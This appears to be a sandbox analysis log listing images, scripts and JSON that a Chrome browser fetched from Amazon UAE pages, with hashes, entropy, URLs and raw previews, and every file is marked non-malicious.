                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3979
                                                                                                                                                                                                                                                                Entropy (8bit):7.85072421974962
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:ToJVbbboVzpSm6kHbbBiF3AF9QboUuanTtSwuHLa297:4bbboVVv6AbbsAvQboXacwuHLBZ
                                                                                                                                                                                                                                                                MD5:4897A0E2804E72BAC86C225EE2277FA9
                                                                                                                                                                                                                                                                SHA1:776951FC8301A5D5416C679866C596EB630509F7
                                                                                                                                                                                                                                                                SHA-256:015DD031D38FB8BABF0A2DCE80F228613D4761EE0E0C81E90C76C6F46F6FF9AB
                                                                                                                                                                                                                                                                SHA-512:0C458B10B38568588F6D1E35214F0D797CEF4324B4EBA6DEE32F99AFA4ECA8FA2540DD75261B130F364A7FE651E76FB33A6131EB611BE40C3D4F4210DB585C2E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61iB-a5cJ2L._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...1AQ..."2Brst345aq...#$..&6CRc..%Td..............................................1.!Q............?..h...................Ah......5..p5.n.....D..=.....sS.}..s.5;^.D.......teH%./..hgYk....V.g...#*0.RF...4...!.l........_G....O....&...X.}DD.D@DD.D@DD.D@DD.D@DD...Z...,.pO;.o`$..=.'.d.q..!=...Q.2r.K..Q....I]#...g.t.z.A.d......cO.#....W.,..Z......(....:....C.H...i).1...s^%.H.s..51-r1........h.4V.....g..L.nR..Z...5..J....N%2.........K5U,.k]!....yZ2..hg.h|n.wh9..u..F.Gt...t......{@..%.#.=.....<,_.C.m..........$..........................W.&."..5..J...8.8/.@...!X.Oo..._../...../\d...m.UT.Hb0.i..D.U...........~.Y....SS....7.\2KO).z..i...'S..5]u..+g..1.....L.,*.../........X......SG...B3..ZHU..5...H....A$....=.VR.3A[.&.V4..)..U.e...{.;Ml
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4884
                                                                                                                                                                                                                                                                Entropy (8bit):5.106593576643181
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:IdNQzriJcrVR9EbtGeSDOMYn2y0uqYT40STfKAHSTfXAp4IpU:IYzrIcpR9Ef+VY2yA04fKAAXAp4IpU
                                                                                                                                                                                                                                                                MD5:739E0F37F509E38E9D932BBE68835C6D
                                                                                                                                                                                                                                                                SHA1:3BD267F304A2C52977DC2BE4C05D9198D47C9672
                                                                                                                                                                                                                                                                SHA-256:9E8C245CCB026C0D786E94FE0FB06805F94C12E654A6AEEEEC7955A90F756B7D
                                                                                                                                                                                                                                                                SHA-512:30947C13569AD9AFBA4753DA6B03F9608F065EDF00DAB32E233C0C1FF9F7950CDCA2E3DA6BD14FAE2C7C178B8EAC8C4487FFA7F8B7B494068D007575699A52CA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRLIYXr6sK-Tdry028JK9OgsAAAGRRsH9MgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICCq3cNZ%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-desktop-ad-center-1&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; to
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):3.2226627197680635
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUzRtwv+L1pse:1/se
                                                                                                                                                                                                                                                                MD5:F837AA60B6FE83458F790DB60D529FC9
                                                                                                                                                                                                                                                                SHA1:14AF87CCEC7F81BB28D53C84DA2FD5A9D5925CDA
                                                                                                                                                                                                                                                                SHA-256:DCECAB1355B5C2B9ECEF281322BF265AC5840B4688748586E9632B473A5FE56B
                                                                                                                                                                                                                                                                SHA-512:A85E09C3B5DBB560F4E03BA880047DBC8B4999A64C1F54FBFBCA17EE0BCBED3BC6708D699190B56668E464A59358D6B534C3963A1329BA01DB21075EF5BEDACE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 306x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16953
                                                                                                                                                                                                                                                                Entropy (8bit):7.948365865167762
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:ASODgsY/keyXCEeCwpIagGu/vaITm18wO79l+YTDMHAmpderu:6z9WBYtigzb79lv3mpIy
                                                                                                                                                                                                                                                                MD5:6F8B7BD378A046CA6B82745F5B7A9A57
                                                                                                                                                                                                                                                                SHA1:F1A888CBE81577CFAC141787F67EBA79E7CF8ED8
                                                                                                                                                                                                                                                                SHA-256:77CF72D5A82E647CAEB66255A93B6D46D26F431A0A935414CDE932635E327216
                                                                                                                                                                                                                                                                SHA-512:01B2CA1F8F817485AFD3837FAC03E862369A464266EE32719201344D769E431A14C905EF22C36A414CC6623CFEE7780BEEC1E5428D88BFA3034DC82F739B8F82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........2.."..........4.................................................................[w......v>.;.Oz..G.U.0~.W<.w..R-.6....m\w....Qxc]e.=.|.nf+|...l^..F..........=..z0..6.'. ...i{.#...[:..I.......mj*.+SA.....qL..7..r..|....i..-.........._h..|.U..tf.8X....Sl%..HVq.Zk...b.......;.......I.di-..z....R.O....X|..m.....0.$F..e..I..=|....?.r....G=X*..SS......Aq;^..%Z.....=2.h7......l.v.....{cz_....}...........l^b.PY....vy...;.....y=.9......R...bb......*.'i.E#=J.;<......H6.q.f..._.}...;.....y3U.G%..@......*.U.Q..h....{a.;<..Uk.x......n.H..]J.........nz..' .D..}J...I=.....w.tt.k.Gy>.............t.{GR....5..:.Y&b.h.....o.[...x......y.g.>.b...zj..P...<.....p..M.z..#2...f.^..o.9\...Mf..T..$.e...(.U...b_..].,..HI...2.+.1~.F.Z9..._Fs].4.:.f..9{c^.?......=t.V9JO5._G.yH.{..Pm4.vN&N/....O.c....D...K....r!...6<a:.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6285
                                                                                                                                                                                                                                                                Entropy (8bit):7.921182941327533
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T0gDErldmso909UpkfPkbbEHO8JHO0sU/+Nm+U0/UvxxjxDBoKGMya:Anms+gYEHNiU/+NZU2UPjxDBuJa
                                                                                                                                                                                                                                                                MD5:C547BE74827265C6BE5BFEF72C41DDA0
                                                                                                                                                                                                                                                                SHA1:B51F2A5E707574FD7BBA35C65469C9429A39E7A7
                                                                                                                                                                                                                                                                SHA-256:4E8B2732C9572562DA934BCDB1E2059184126B2566671EDA83BDC1515D70699A
                                                                                                                                                                                                                                                                SHA-512:46CB94E19A12812386D1F3CAB7936FB242253A9DAA9DF28F9D62695566E3F4FF3C5B627AC303C7608184D81D1FC786CE6925D1AF6BC43689B59518B116F32544
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1Q..A"..#2Baqs.....3Tr....45bt.$6RU..DSc...................................................1..!...2AQRq..3a..."4B.#Sb.$r..............?..-......sx.]f..',/........o..t6O.n.0.b......[.^.*).K..v..S..L.DE.3.M...Q.~5/.$.W*D..............h..b1.8..{Fo2..//~u..$.W..7.M...i.....t<....}....u>.....?.,....K.VrXk....%....J.I|.~H..=(......ehn..N..}..m.h...........^?HZ.........2z;i...qd......L.G..;.X..d.2......2.-=.u.......O......5>....}c..{;jw.....YF....HX_.z..........?.^O...x...Y.^.dT.6...z..C.Z.........J.. .+...._>..5>....<@....jz^....=...L........~#..}c.a'.9P....O.......O.....l.>...G...^......?...q....."f.6.o..Z.t...........?.K-.e%..d<6....>?.g.<!....."|>[.h&....B.+.?...z.... ............:...u]RJ...T^.............C.....?.@..P.H.\9.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1685
                                                                                                                                                                                                                                                                Entropy (8bit):7.264365815081339
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6pUQTE0Qop5Zt/Uf/PokOyYD4diebJeyO:TK3pw5ZtsHP3BHt9eL
                                                                                                                                                                                                                                                                MD5:26182EFBD4979DD69FE1EB517F9A39DC
                                                                                                                                                                                                                                                                SHA1:DC8D3C0A23239F449639292CEFDEB6BD5589000A
                                                                                                                                                                                                                                                                SHA-256:215741A74180546322A1586F0B660BBA2A5313116789021D9A204A084686ACED
                                                                                                                                                                                                                                                                SHA-512:C18C9F572C626F48CB8B4459DA1091A91E2B4821EF51BACE283CA275B41DF3B7C0128828630552125F350634156C2CE39CBBF0959357550624338A2A3832A14F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.2Q.ABaq.."R......b..................................................!1...Q.3Aq$2BR...............?.....t@.............................................................zk[.MI..-.e.......*..d...l...}..U.."...'..,.G....k}...^{._Z.K.....C#..~.Z....l,...IF.FQ..Ku.&(.D..{...o.y..HC2...$..R\...W5.Az.....NMW...m.j{}vob^...t#.Gz..D............B.)N.q.....rQ.kg..m..>.t..Z...>HE...0.......c|.\.k..o.U'.G.X.]W9..6..p.,2...".%E..%.....o..Svw[4u..6<.DW.[{.9l.S"..Qt..../.....n...4...9=..oh....Z~.4|.o.7..l.xG..n'./...$(...D<.f.....'.....^8Z..yd..7..O&..,vO..pYV...Z..z....j..N}.....p..1.m.a..5r8.NQj..}..J?.tvp.../o..c.E...v.........Y..d..3..F-..v.......L.G.]'/"..6...kQ..AcA.ty.t.%q..OY:......I./.sSP....a.hY.d..F?.....~.(.....~....vNDT.z..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D1268%26pc%3D5708%26at%3D5708%26t%3D1723469093785%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5707
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):93236
                                                                                                                                                                                                                                                                Entropy (8bit):5.397125859693619
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                                                                                MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                                                                                SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                                                                                SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                                                                                SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (661)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):510414
                                                                                                                                                                                                                                                                Entropy (8bit):5.481849721457995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:B1dVp8opvwtWgupFmzQPOkzblCAx1CDz1TJymdWAkuc03Fp0c/DrniaOdKS7xmzw:/JwrFkzblPSZzZZKjDXecIen7
                                                                                                                                                                                                                                                                MD5:0664BD144840D3E4FCB37012F6C9870F
                                                                                                                                                                                                                                                                SHA1:F84DB189E5CD87038C4866F2A00952881A543E7E
                                                                                                                                                                                                                                                                SHA-256:E66C34AC267A3E2CB25355EE18E681D0851BE7F387345960ED7388FA3A702E0D
                                                                                                                                                                                                                                                                SHA-512:1FB4127D46AFBF7925D757602EF99790F6BF2AADC011D2C1188302D6CC05CE2D01EB5354290F8D9B4EC97648E7DB3BE40935B7375029FF62A40ACD4C4D48DDB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/01uyz9BO3mL._RC%7C01bzvM+YbkL.js,010ghrVeGXL.js,011ZAUoBkGL.js,01pfcv4RKLL.js,01QUgYbNyTL.js,01ikzOA7NuL.js,317dyAcfNdL.js,61335r2d9RL.js,31B3HDxjAhL.js,01GHajztuJL.js,11Ff2wvxDJL.js,71RE17mn6bL.js,61SKOTENbyL.js,61QOrsrj46L.js_.js?AUIClients/SharedShoppingCartDesktopAsset"
                                                                                                                                                                                                                                                                Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("TurboCheckoutBaseAssets@accessibility_switch",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("turbo-initiate-migration-switch").register("turbo-checkout-accessibility-switch",function(a){return{isEnabled:function(){return a.isEnabled()}}})});./* ******** */.(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("TurboCheckoutBaseAssets@buy_now_to_tango_switch",""):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){a.when("turbo-configuration","buy-now-to-tango-switch-mobile","buy-now-to-tango-switch-desktop","buy-now-to-tango-switch-beta").register("buy-now-to-tango-switch",function(b,a,c,d){return{isEnabled:function(){return b.get(b.KEYS.IS_BUY_NOW_TO_TANGO_ENABLED)&&(a.isGatingWeblabEnabled()||.c.isGatingWeblabEnabled()||d.isGatingWeblabEnabled())}}});"use st
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 175x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5314
                                                                                                                                                                                                                                                                Entropy (8bit):7.928208905623052
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TurzFVrWyn8BGRctEIgICY2GVCXA2zUHBXj6tMiSYvksLV8AXmaIsFaRhaW3:kjiBptEIsYlcUBj61nL5lFaRY4
                                                                                                                                                                                                                                                                MD5:F772561C92F880536B74D7AA86237AE9
                                                                                                                                                                                                                                                                SHA1:41BB673EA20CA70D264B611017368CCB59C1B0D0
                                                                                                                                                                                                                                                                SHA-256:7AE6EEDFED98CB04331C7AD9B32372ED118EBFEA1BFC92CFDDBDF04943C8462F
                                                                                                                                                                                                                                                                SHA-512:F843681E64A116BCED6B03D630499A747D9C381D2058F12A3A03B5B7DEF6812475D9E4F12FB6AEF9E4B7F37FA5E4A37A18D64B46C3798F3EF0C03EC874752401
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!1.A.."Qq..2Ra..#........BTb...3C.$Dr...................................................!..1."2Aa...RS.Q.#Bq..............?....(...qL-.Z....q&...................5q<;$...C.]....e.M.A......\9...=e.3.y..}P.*...l.('gA....[J-..j9.....c.v.#..S.i..1..R..`yg..._;..J.M.bC.m.F.N.....@....?./.R..Q.!f..M.5...q..5;..[.m.Y.u.&....4...5<sE.......].`...&.qO.a..."....2.7.b......kHTrv:h.]V.....j.t.8...}aX.:...%M....wa\...c...l....=a.)u...k..X..o.m....js,<{^G....*..C..F..5j.t....QE.%.8...b.........~l+h.I....V#.&q.{)..aW.<K....7G......ro.....<z..g..x.*Y(P...OUG}E$.........:K#..T....T..D.....g..5.S.-Ch.H-..."8s..bk........V..Gv...5.............}......5.....26..p..4..x...{B.L..p.W..m.?@.}}...<(..N!E.U...Nq]V.'.|...2..u....FQ?}h.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 202x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6821
                                                                                                                                                                                                                                                                Entropy (8bit):7.934130504921343
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:lLrtiJIibrCz9aQXdV/yBWCHtXkLk00TfTEOPP:lPtiNbOz9aWHStXgj0TfTEOn
                                                                                                                                                                                                                                                                MD5:31FA2CB9B5B95C589C6CE40993577BBF
                                                                                                                                                                                                                                                                SHA1:E840DF28E5436A0B8B644A6F9DE7679F80162D20
                                                                                                                                                                                                                                                                SHA-256:48FB04A7F9436FE57D7C217449146CEF6240E58078307321338A7B49F9B90B2D
                                                                                                                                                                                                                                                                SHA-512:3249CB07D0998F915F67CCCD96540CF4D13CCC308551196D468C508A1F1CA6DA0282CDBA21F01AF81B29BDCF8C386C3FEED1487EA86AB83843D35B4E8F23DC25
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71ikPCHuz3L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.."2AQq..3Tar......BR........#b..CDs....$%5c..............................................R.1A.!."Qa............?...E.A%@...T..B..{.Q.)....z..Y...b...T.L.I.s'..M4...w.w....l.~cK.9....a.....}......^tSi...=..........).QM.:...{.J..S..E6h..N.'..z_.9.).%6j$<f..=......o.TlQM.Q'.C.?.....5..'..".GLK.Q=h?._...U...CE..:bk..+.K.F.>..".GLN5r.L$..E-1.....?1O...(.."..f=eUd....E.Y_*..Y....S.mh9.........X...h...c.EeE.4VTP..+*(i..YE$P..+*J.i"..J..o.>...{L..*}S......(...!....Vj..=.}c..f...V...N...E]..%-...R..@....)"......(1.+*(0....JH....J.....O.~b.S\?.T..:.F/..*.;.z....U..q.A.X...Y....S.kg.Wx.u.KE-.M....S.......J;%=.=I...q9...#....8.(..{..ZK..6.!h9......x...k..*AP.....I#B$.GmB.d5.;M..k...yo...:..J.ePS..M.*.^..[[.)..He....7$.P 'Ba..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1489
                                                                                                                                                                                                                                                                Entropy (8bit):7.1141970928897695
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0CmzAft8w1y7i+eDuIA26h5IjuNQUuOpRlTo9O1FpNcQnrPgUEp1frVD:TT0rMfOO4dy6dh6EFRp/D1fNTroBx5D
                                                                                                                                                                                                                                                                MD5:13F41DFBD27EF1F585F6894C069F1F02
                                                                                                                                                                                                                                                                SHA1:380667C617B0C30F5EAE87FE011AE5ABA665BFEF
                                                                                                                                                                                                                                                                SHA-256:1D14FE9426109B1379B138E6549FB299661754DFD4823FEB8F67E34DC1A60FCD
                                                                                                                                                                                                                                                                SHA-512:2A1EADCABF84EE2A8EB3A1E09A149E0A7E83FD91C86E910881BF2E7CBB61668837E9E3BC12210C8BEE0D99679D170C58B7072EF90D1F4AA730AAF7C4EE31719C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71mL0rwKWNL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........z...................................................1.!4As...5a.."$Bq...R....23Q.....................................................?...........Dt.l_gi..gv\...9../Y...ia.D.Ku.R:.?.(.O....;...>.q...!L...l.w...kO.......:w...Ku.~]....]:...[[.|.fU..L.....qi.^......l..-...;._.LuZ...!Y..V-....o.6../..:;...Y.......M....l_.m...g....6....|.w8..t.................g.-..i..~........6...."g..PB......1......~O..6.-..i......z=.[.S_g...}..;.?..K..N.....\o.m.1x.....pj.o..pLd.j.pO....-}.tB.vf..y..e...._.6..................S.r.4.1..s~.....!..'......u....v....7.b.m......z...S...........=.c......U....Oac._...\\7....n.}...-......O.......................].r.}!2..v.._HX<.y+...*...TT5|.4..u|.4....icS.qD....j...B..>..j.Y...................].r.}!4..v.._....^J...a..*)..o.nR.j.......yO..Z..a
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2354
                                                                                                                                                                                                                                                                Entropy (8bit):7.7983762557864855
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r8ugddGbnVg5drcspO38av1A43N+klwuwmpCVBo:Tj1rcspOMb433P1iBo
                                                                                                                                                                                                                                                                MD5:8E65C5BF438DA029BEED5759985ED82F
                                                                                                                                                                                                                                                                SHA1:47C01210115A756F85B952564D2AF49FC170DB10
                                                                                                                                                                                                                                                                SHA-256:39495131401B71CA51F5B4D4A1746037A0652EC179D51E0D228933D0AE8145B7
                                                                                                                                                                                                                                                                SHA-512:B93002AD79E156246AF9A91F6829B55062BD786A08C47D47F031C65EB717370082B131BC65620A94ED4C79AA206961F312B69D2DE92A4D4E6CA401DE069493E0
                                                                                                                                                                                                                                                                Malicious:false
